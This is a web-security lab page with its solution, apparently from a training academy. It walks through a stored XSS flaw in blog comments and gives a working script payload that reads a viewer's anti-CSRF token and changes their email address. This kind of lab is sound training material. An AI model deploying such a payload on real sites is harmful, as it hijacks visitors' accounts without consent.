This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials: wiener:peter
Learning path
If you're following our suggested learning path, please note that this lab requires some understanding of topics that we haven't covered yet. Don't worry if you get stuck; try coming back later once you've developed your knowledge further.
Hint
You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, make sure you use a different email address for the final exploit you deliver to the victim.
Log in using the credentials provided. On your user account page, notice the function for updating your email address.
If you view the source for the page, you'll see the following information:
You need to issue a POST request to /my-account/change-email, with a parameter called email.
There's an anti-CSRF token in a hidden input called token.
This means your exploit will need to load the user account page, extract the CSRF token, and then use the token to change the victim's email address.
Submit the following payload in a blog comment:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
This will make anyone who views the comment issue a POST request to change their email address to test@test.com.
Community solutions
Michael Sommer
Want to track your progress and have a more personalized learning experience? (It's free!)
